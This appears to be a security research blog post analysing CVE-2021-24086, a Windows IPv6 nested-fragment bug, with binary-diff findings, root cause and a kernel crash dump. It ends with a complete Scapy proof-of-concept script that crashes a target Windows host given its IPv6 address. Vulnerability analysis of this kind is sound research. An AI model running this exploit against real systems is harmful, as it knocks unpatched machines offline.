Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086

In this blog post we analyze a denial of service vulnerability affecting the IPv6 stack of Windows. This issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin.

Introduction

On February 9th, 2021, Microsoft published a security patch addressing a denial of service vulnerability, identified as CVE-2021-24086, affecting the IPv6 stack of every version of Windows. The issue was caused by improper handling of IPv6 fragments.

This blog post discusses the vulnerability and presents a proof-of-concept for it.

A primer on IPv6 fragmentation

In this section we briefly discuss how fragmentation works in IPv6. If you are new to this subject, you may want to read more about it in Section 4.5 of RFC 8200.

In order to send a packet that is too large to fit in the maximum transmission unit (MTU) of the path to its destination, an IPv6 source node may divide the packet into fragments and send each fragment as a separate packet, to be reassembled at the receiver.

Fragmentation, which is a core feature of IPv6, is implemented via an Extension Header (the Fragment header, identified by the Next Header value 44). The Fragment header has the following format:

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Next Header  |   Reserved    |      Fragment Offset    |Res|M|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Identification                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
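
As a rough illustration of the layout above, the following sketch packs and unpacks the 8-byte Fragment header with Python's struct module. The function names are hypothetical and chosen only for this example; the field widths follow the diagram (8-bit Next Header, 8-bit Reserved, 13-bit Fragment Offset in 8-octet units, 2 reserved bits, the M flag, and a 32-bit Identification).

```python
import struct


def pack_fragment_header(next_header, offset_units, more, ident):
    """Build the 8-byte Fragment header; offset_units is in 8-octet units."""
    if not 0 <= offset_units < (1 << 13):
        raise ValueError("Fragment Offset is a 13-bit field")
    # 13-bit offset in the high bits, 2 reserved bits, then the M flag
    offset_res_m = (offset_units << 3) | (1 if more else 0)
    return struct.pack("!BBHI", next_header, 0, offset_res_m, ident)


def unpack_fragment_header(data):
    """Decode the first 8 bytes of data as a Fragment header."""
    next_header, _reserved, offset_res_m, ident = struct.unpack("!BBHI", data[:8])
    return {
        "next_header": next_header,
        "offset_bytes": (offset_res_m >> 3) * 8,
        "more": bool(offset_res_m & 1),
        "id": ident,
    }


# Last fragment of an ICMPv6 (58) payload, starting 8 bytes into the fragmentable part
hdr = pack_fragment_header(58, 1, False, 0x11111111)
fields = unpack_fragment_header(hdr)
```

Because the offset is expressed in 8-octet units, every fragment except the last one has to carry a multiple of 8 bytes.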

When a large packet is split into fragments, the original packet is first divided into an unfragmentable part and a fragmentable part.

  • The unfragmentable part is composed of those parts of the original packet that must be processed by intermediate nodes between the sender and the receiver. That includes the IPv6 header, plus any extension headers that need to be processed by nodes en route to the destination (e.g. Hop-by-Hop Options header, Destination Options header for intermediate destinations, and Routing header).
  • The fragmentable part is composed of those parts of the original packet that must be processed only at the final destination node. That includes all other extension headers that are not included in the unfragmentable part of the packet (e.g. Destination Options header for the final destination), the upper-layer header (e.g. ICMPv6, TCP, UDP), and the upper-layer payload.

Fragmentation process

Let's see with a practical example how an IPv6 packet is fragmented. Our example packet is composed of an IPv6 header, followed by a Hop-by-Hop Options header, followed by an ICMPv6 header and its payload.

  • The unfragmentable part consists of the IPv6 header plus the extension headers that must be processed by nodes en route to the destination (Hop-by-Hop Options header in this example).
  • The fragmentable part consists of the upper-layer header (ICMPv6 in this case) plus the ICMPv6 payload.

The fragmentable part of the original packet is divided into fragments that fit within the MTU of the path to the packet's destination. Then, the fragments are transmitted in separate "fragment packets", as shown below. Each fragment packet consists of the unfragmentable part, followed by a Fragment header, followed by a slice of the fragmentable part.
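
The splitting step can be sketched in a few lines of plain Python. This is a simplified model and not code from any real stack: the function name and the (offset, more, chunk) tuple layout are assumptions made for the example, and the headers themselves are left out.

```python
def split_fragmentable_part(fragmentable, max_chunk):
    """Return (offset_in_8_octet_units, more_flag, chunk) triples."""
    # Every fragment except the last must carry a multiple of 8 bytes
    chunk_size = max_chunk - (max_chunk % 8)
    if chunk_size <= 0:
        raise ValueError("max_chunk must be at least 8 bytes")
    fragments = []
    for start in range(0, len(fragmentable), chunk_size):
        chunk = fragmentable[start:start + chunk_size]
        # M is set on every fragment except the one that reaches the end
        more = start + chunk_size < len(fragmentable)
        fragments.append((start // 8, more, chunk))
    return fragments


# A 20-byte fragmentable part split into slices of at most 8 bytes
frags = split_fragmentable_part(bytes(range(20)), 8)
```

Each triple corresponds to one fragment packet: the offset and the flag go into its Fragment header, and the chunk follows it.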

Reassembly process

When all the fragments arrive at the destination node, the receiver reassembles the original packet from the fragments:

  • The unfragmentable part of the reassembled packet is taken from the first fragment packet (excluding the Fragment header).
  • The fragmentable part of the reassembled packet is constructed from the fragments following the Fragment headers in each of the fragment packets.

The diagram below illustrates this process.
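
The two rules above can be modelled as follows. This is a minimal sketch under stated assumptions: fragments are given as hypothetical (offset, more, chunk) tuples, holes and overlaps are simply rejected, and the fix-ups a real receiver performs on the reassembled IPv6 header (such as the Payload Length) are omitted.

```python
def reassemble(unfragmentable, fragments):
    """fragments: iterable of (offset_in_8_octet_units, more_flag, chunk).

    Returns the reassembled packet bytes, or None if the set is incomplete.
    """
    total_len = None
    pieces = {}
    for offset_units, more, chunk in fragments:
        start = offset_units * 8
        pieces[start] = chunk
        if not more:
            # The last fragment fixes the length of the fragmentable part
            total_len = start + len(chunk)
    if total_len is None:
        return None
    fragmentable = bytearray()
    for start in sorted(pieces):
        if start != len(fragmentable):
            return None  # hole or overlap: this sketch simply gives up
        fragmentable += pieces[start]
    if len(fragmentable) != total_len:
        return None
    return bytes(unfragmentable) + bytes(fragmentable)


# Fragments may arrive out of order
packet = reassemble(b"HDR", [(1, False, b"tail"), (0, True, b"12345678")])
```

Note that the unfragmentable part is passed in once, which mirrors the rule that it is taken from the first fragment packet only.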

Binary diffing

A McAfee Labs blog post states that "The root cause of this vulnerability is a NULL pointer dereference which occurs in Ipv6pReassembleDatagram. The crash occurs when reassembling a packet with around 0xffff bytes of extension headers. It should be impossible to send a packet with that many bytes in the extension headers according to the RFC, however this is not considered in the Ipv6pReceiveFragment function when calculating the unfragmented length".

tcpip!Ipv6pReassembleDatagram is the function in charge of reassembling the received fragmented packets. By performing a binary diff of this function we can spot the actual fix.

The function calculates the total size of the reassembled packet as the size of the IPv6 header + the size of the extension headers in the unfragmentable part + the size of the reassembled fragmentable part. In the patched version, on the right side of the image, a new sanity check was added: if the size of the extension headers in the unfragmentable part + the size of the reassembled fragmentable part (held in the EDX register) is greater than 0xffff, the function bails out and deletes the reassembly set; otherwise, it goes on with the reassembly process.
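
Expressed in Python, the check described above amounts to something like the sketch below. This is only a model of the comparison as described in this post, not a decompilation of tcpip.sys; the function name, the constant name, and the sample lengths are hypothetical.

```python
MAX_PAYLOAD_LENGTH = 0xffff  # largest value that fits in a 16-bit length field


def should_discard_reassembly(unfragmentable_ext_len, fragmentable_len):
    """Model of the added check: True means the reassembly set is dropped."""
    return unfragmentable_ext_len + fragmentable_len > MAX_PAYLOAD_LENGTH


# Hypothetical lengths: an oversized set is dropped, an ordinary one is kept
oversized = should_discard_reassembly(0xffd0, 0x40)
ordinary = should_discard_reassembly(0x8, 0x500)
```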


We can also observe a change in the tcpip!Ipv6pReceiveFragment function, which seems to be a fix for this vulnerability as well: in the patched version, on the right side of the image, if the fragment being processed belongs to a packet that has been identified as a Jumbogram (meaning that its size is greater than 0xffff), then it bails out and calls IppSendError; otherwise, it continues processing the fragment.


Things look pretty clear at this point: we need to craft a packet with approximately 0xffff bytes of extension headers in the unfragmentable part. But the length of the extension headers in the unfragmentable part is taken from just the first fragment packet, whose length is constrained by the MTU, so we can only put around 1500 bytes of extension headers in the unfragmentable part. So, how is it even possible to obtain such a huge length of extension headers?

Fragments within fragments

The answer to our question is nested fragments.

It turns out that you can put IPv6 fragments inside IPv6 fragments, and that will trigger a recursive packet reassembly. This is not something new: in fact, I took this idea from a presentation at the Troopers 2013 conference by researcher Antonios Atlasis, who has been abusing fragments and extension headers to conduct attacks against IPv6 stacks for a long time.

It's important to note that not all operating systems accept nested IPv6 fragments: Windows does, but some others such as FreeBSD don't.

In a graphical way, we can craft nested fragments by composing packets like this:

The tcpip!Ipv6pReceiveFragment function will process each one of the N outer fragments (identified by the ID 0x11111111 in this example). When the last outer fragment is received, it calls tcpip!Ipv6pReassembleDatagram to reassemble the original packet. The reassembled packet will then look like this:

Windows will notice that the reassembled part is basically another succession of fragments that need to be reconstructed, so that will trigger a recursive packet reassembly, to finally obtain the original packet:

Adding tons of extension headers

So, how can we leverage nested fragments to build a packet with around 0xffff bytes of extension headers in the unfragmentable part? It turns out that the constraint of extension headers being limited to around 1500 bytes that we observed on regular fragmented packets does not apply to packets reconstructed from nested fragments. In other words, we can put an arbitrary number of extension headers, as long as they belong to nested fragments.
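
To make the accounting concrete, here is a small sketch of how a receiver could walk a chain of extension headers and measure its length. It relies on the common extension header layout from RFC 8200 (Next Header in the first byte, Hdr Ext Len in the second, counted in 8-octet units beyond the first 8 octets). The function name is hypothetical and this is not how tcpip.sys is written.

```python
# Next Header values of the extension headers this sketch walks through
EXT_HEADERS = {0: "Hop-by-Hop Options", 43: "Routing", 60: "Destination Options"}
FRAGMENT = 44


def walk_extension_headers(first_next_header, data):
    """Return (bytes_consumed, next_header_value_reached)."""
    next_header, pos = first_next_header, 0
    while next_header in EXT_HEADERS:
        if pos + 8 > len(data):
            raise ValueError("truncated extension header")
        following, hdr_ext_len = data[pos], data[pos + 1]
        # Hdr Ext Len counts 8-octet units beyond the first 8 octets
        pos += (hdr_ext_len + 1) * 8
        next_header = following
    return pos, next_header


# Three empty Routing headers; the last one announces a Fragment header
empty_routing = bytes([43, 0, 0, 0, 0, 0, 0, 0])
last_routing = bytes([FRAGMENT, 0, 0, 0, 0, 0, 0, 0])
length, reached = walk_extension_headers(43, empty_routing * 2 + last_routing)
```

Nothing in such a walk is bounded by the MTU: the measured length only depends on how many headers the buffer contains.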

We can build an inner packet like this:

Notice that we are using 0x1ffa Routing headers to achieve our target length of extension headers. An empty Routing header accounts for 8 bytes, so the total size of the extension headers in the unfragmentable part is 0xffd0, which is enough to trigger the bug. Including such a huge number of Routing headers is not possible under regular, non-nested fragments, because only the extension headers from the first fragment packet would count, and the first fragment packet is limited by the MTU of 1500 bytes. However, when dealing with nested fragments, there's no such thing as a "first fragment packet": the inner payload is arranged as a single, large chunk of bytes as a result of the reassembly of the outer fragments, and so there's no limit on the size of the extension headers.
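
The numbers in the previous paragraph can be checked with a few lines of arithmetic. The constant names are made up for this example, and the single-packet figure assumes a 1500-byte MTU with only the IPv6 header and one Fragment header besides the Routing headers.

```python
ROUTING_HEADER_SIZE = 8     # an empty Routing header
IPV6_HEADER_SIZE = 0x28     # fixed IPv6 header
FRAGMENT_HEADER_SIZE = 8
MTU = 1500                  # assumed Ethernet-style MTU

# Extension header bytes obtained with 0x1ffa nested Routing headers
nested_ext_len = 0x1ffa * ROUTING_HEADER_SIZE

# Rough upper bound on empty Routing headers in one regular fragment packet
max_headers_single_packet = (
    MTU - IPV6_HEADER_SIZE - FRAGMENT_HEADER_SIZE
) // ROUTING_HEADER_SIZE

print(hex(nested_ext_len))        # 0xffd0
print(max_headers_single_packet)  # 181
```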

The "first part" in the image above must be sent split into fragments, so it constitutes the nested fragments per se. On the other hand, the "second part" is just the last inner fragment, and it's not necessary to send it nested. In fact, while doing tests, I found out that this last inner fragment must not be sent nested together with the first part, otherwise the recursive reassembly is not triggered.

To summarize, the nested fragments needed to trigger the bug will look like this:

The crash

When tcpip!Ipv6pReassembleDatagram is recursively invoked to handle our nested fragments, it calls NdisGetDataBuffer to read (length of extension headers + sizeof(IPv6_header)) bytes from the NET_BUFFER structure holding our packet data. The length of our extension headers is 0xffd0 and the fixed size of the IPv6 header is 0x28, so it attempts to read 0xfff8 bytes.

Notice that the Storage parameter in that call is set to NULL. The NdisGetDataBuffer API documentation states that if the data in the NET_BUFFER is not contiguous, and if the Storage parameter is NULL, then the return value is NULL. This is exactly the case that we hit with our specially crafted length of extension headers: NdisGetDataBuffer returns NULL, and the returned NULL pointer (temporarily saved to the size_of_ext_headers_plus_sizeof_IPv6_hdr variable, as shown above highlighted in red) is dereferenced, causing a BSoD:

This is the crash information that we can observe in the kernel debugger:

DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: 0000000000000000, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000001, value 0 = read operation, 1 = write operation
Arg4: fffff80170b9937b, address which referenced memory


TRAP_FRAME:  fffff80171472960 -- (.trap 0xfffff80171472960)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=ffffce0ae3366080
rdx=0000000000000002 rsi=0000000000000000 rdi=0000000000000000
rip=fffff80170b9937b rsp=fffff80171472af0 rbp=ffffce0ae1cfe500
 r8=ffffce0ae353f980  r9=0000000000000001 r10=ffffce0ae4edf040
r11=0000000000000001 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na pe nc
tcpip!Ipv6pReassembleDatagram+0x14f:
fffff801`70b9937b 0f1100          movups  xmmword ptr [rax],xmm0 ds:00000000`00000000=????????????????????????????????
Resetting default scope

STACK_TEXT:
fffff801`71472af0 fffff801`70b9a122     : ffffce0a`e1ee7000 00000000`00000000 00000000`00000002 ffffb5e7`00010067 : tcpip!Ipv6pReassembleDatagram+0x14f
fffff801`71472b90 fffff801`70b9a242     : ffffce0a`e54399b0 fffff801`70bf0008 ffffce0a`e1be6810 ffffce0a`e355d4a0 : tcpip!Ipv6pReceiveFragment+0x84a
fffff801`71472c60 fffff801`70ab5316     : ffffce0a`00000001 ffffce0a`e1ee7000 ffffce0a`e33e42e0 ffffce0a`e1ee7000 : tcpip!Ipv6pReceiveFragmentList+0x42
fffff801`71472c90 fffff801`70a359ff     : fffff801`70bf3000 ffffce0a`e1a6b7e0 ffffce0a`e1ee7000 ffffce0a`e544fd00 : tcpip!IppReceiveHeaderBatch+0x7f0b6
fffff801`71472d90 fffff801`70a32d9c     : ffffce0a`e32b9380 ffffce0a`e33e4550 00000000`00000001 00000000`00000000 : tcpip!IppFlcReceivePacketsCore+0x32f
fffff801`71472eb0 fffff801`70a7efd0     : ffffce0a`e33e4550 00000000`00000000 fffff801`71472f81 00000000`00000000 : tcpip!IpFlcReceivePackets+0xc
fffff801`71472ee0 fffff801`70a7e5cc     : 00000000`00000001 ffffce0a`e36d4800 fffff801`70a71a50 fffff801`714732bc : tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x270
fffff801`71472fe0 fffff801`6e00d468     : ffffce0a`e1effba0 00000000`00000002 ffffce0a`e5474080 fffff801`714732d8 : tcpip!FlReceiveNetBufferListChainCalloutRoutine+0x17c
[...]
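
The NULL return behind this crash can be illustrated with a toy model of the return-value rules quoted earlier from the NdisGetDataBuffer documentation. This is Python standing in for a kernel API, so everything here is an assumption made for illustration: the function name, the list of byte chunks standing in for the buffer chain, and the 0x400-byte chunk size.

```python
def ndis_get_data_buffer_model(chunks, bytes_needed, storage=None):
    """Toy model of the documented return-value rules, not the real API.

    chunks: list of bytes objects standing in for the buffer chain.
    Returns a bytes-like object, or None to represent a NULL pointer.
    """
    if sum(len(c) for c in chunks) < bytes_needed:
        raise ValueError("request exceeds the data held by this toy model")
    if chunks and len(chunks[0]) >= bytes_needed:
        # Contiguous: the request is satisfied by the first buffer
        return memoryview(chunks[0])[:bytes_needed]
    if storage is None:
        # Not contiguous and no Storage supplied: NULL
        return None
    # Not contiguous: copy into the caller's storage and return it
    storage[:bytes_needed] = b"".join(chunks)[:bytes_needed]
    return storage


read_len = 0xffd0 + 0x28             # extension headers + IPv6 header
chunks = [bytes(0x400)] * 0x40       # hypothetical non-contiguous layout
result = ndis_get_data_buffer_model(chunks, read_len)  # None, i.e. NULL
```

In this model, passing a storage buffer (for example bytearray(read_len)) would yield a usable copy instead of None, which is why a caller that passes NULL for Storage has to check the return value before writing through it.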

Proof of concept

The following Python code triggers the vulnerability, crashing the specified target machine:

import sys
import random

from scapy.all import *

FRAGMENT_SIZE = 0x400
LAYER4_FRAG_OFFSET = 0x8

NEXT_HEADER_IPV6_ROUTE = 43
NEXT_HEADER_IPV6_FRAG = 44
NEXT_HEADER_IPV6_ICMP = 58


def get_layer4():
    er = ICMPv6EchoRequest(data = "PoC for CVE-2021-24086")
    er.cksum = 0xa472

    return raw(er)


def get_inner_packet(target_addr):
    inner_frag_id = random.randint(0, 0xffffffff)
    print("**** inner_frag_id: 0x{:x}".format(inner_frag_id))
    raw_er = get_layer4()

    # 0x1ffa Routing headers == 0xffd0 bytes
    routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)
    routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))

    # First inner fragment header: offset=0, more=1
    FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)

    return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id


def send_last_inner_fragment(target_addr, inner_frag_id):

    raw_er = get_layer4()

    ip = IPv6(dst = target_addr)
    # Second (and last) inner fragment header: offset=1, more=0
    FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)
    send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])


def trigger(target_addr):

    inner_packet, inner_frag_id = get_inner_packet(target_addr)

    ip = IPv6(dst = target_addr)
    hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)

    outer_frag_id = random.randint(0, 0xffffffff)

    fragmentable_part = []
    for i in range(len(inner_packet) // FRAGMENT_SIZE):
        fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])

    if len(inner_packet) % FRAGMENT_SIZE:
        fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])


    print("Preparing frags...")
    frag_offset = 0
    frags_to_send = []
    for i in range(len(fragmentable_part)):
        # The M (more fragments) flag is cleared only on the last outer fragment
        if i == len(fragmentable_part) - 1:
            more = 0
        else:
            more = 1

        FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)

        blob = raw(FH/fragmentable_part[i])
        frag_offset += FRAGMENT_SIZE

        frags_to_send.append(ip/hopbyhop/blob)


    print("Sending {} frags...".format(len(frags_to_send)))
    for frag in frags_to_send:
        send(frag)


    print("Now sending the last inner fragment to trigger the bug...")
    send_last_inner_fragment(target_addr, inner_frag_id)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: cve-2021-24086.py <IPv6 addr>')
        sys.exit(1)
    trigger(sys.argv[1])

Conclusion

The root cause of this vulnerability is the fact that, when attempting to reassemble nested fragments, Windows counts all the extension headers included in the inner payload. By contrast, when dealing with regular fragments, only the extension headers included in the very first fragment packet are counted. There is no such thing as a "first fragment packet" when attempting a recursive reassembly of nested fragments: the inner payload is just a single, large chunk of bytes, as a result of the reassembly of the outer fragments.

Arguably, there's no real reason to support nested fragments. Unlike in IPv4, intermediate nodes in IPv6 cannot fragment packets; only the sender can do it, and there's no reason for a legitimate IPv6 node to send fragments within fragments. Therefore, removing support for nested fragments (as some other operating systems already do) may be a better solution in the long term, since supporting such a complex feature for which there's little to no use may leave the door open for further vulnerabilities.

Regarding the impact of the vulnerability, it is limited to causing a BSoD on the target machines, thus resulting in a denial of service condition. However, since it affects all Windows IPv6 deployments under all Windows versions, the potential to cause service disruptions is high. It's also important to note that, as stated by Microsoft, Windows systems configured with only link-local IPv6 addresses are not reachable from the Internet; in that case, attacks can only originate from the local network.
